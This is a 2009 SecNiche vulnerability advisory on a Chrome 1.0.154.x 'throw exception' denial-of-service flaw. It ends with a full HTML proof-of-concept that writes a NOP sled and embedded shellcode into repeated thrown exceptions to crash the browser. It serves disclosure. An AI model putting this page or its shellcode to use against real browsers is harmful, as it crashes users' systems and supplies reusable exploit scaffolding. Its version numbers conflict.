Google Chrome 1.0.154.59 "throw exception" Memory Corruption Vulnerability.

Version Affected:
1.0.154.59 . Previous versions are vulnerable too

Description:
The Google chrome browser is vulnerable to memory exhaustion based
denial of service
which can be triggered remotely.The vulnerability is a result of
arbitrary shell code which
 is rendered in a script tag with an exception that is raised directly
with throw statement. It
makes the browser to consume memory thereby impacting the focussed
window and leads
to crash. The impact can be stringent based on different systems.

Proof of Concept:
http://www.secniche.org/gthr

Detection:
SecNiche confirmed this vulnerability affects Google Chrome on Microsoft
Windows XP SP2
platform.The versions tested are:1.0.154.59

Disclosure Timeline:
Release Date. April 28 ,2009

Credit:
Aditya K Sood

Disclaimer:
The information in the advisory is believed to be accurate at the time
of publishing based on
currently available information. Use of the information constitutes
acceptance for use in an AS IS
condition. There is no representation or warranties, either express or
implied by or with respect to
anything in this document, and shall not be liable for a ny implied
warranties of merchantability
or fitness for a particular purpose or for any indirect special or
consequential damages.

-------------------------------------------

<html>
<head>
<title>Google Chrome 1.0.154.53 "throw exception" Remote Crash and Denial of Service -  </title>
<script language="JavaScript">
 var nop_sled=unescape("%u9090");
 var shellcode_sled=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
 for(var i=0;i<64;i++){
  nop_sled=nop_sled+nop_sled;
  document.write('<script>throw nop_sled+shellcode_sled;</scr'+'ipt>');
 }
</script>
</head>
<body>
<center><h1> Google Chrome 1.0.154.53 "throw exception" Remote Crash and Denial of Service</h1>
<h2> Executing NOP Sled and Shellcode to create an Exception</h2>

<h2> SecNiche Security (C) Aditya K Sood </h2>
</center></body>
</html>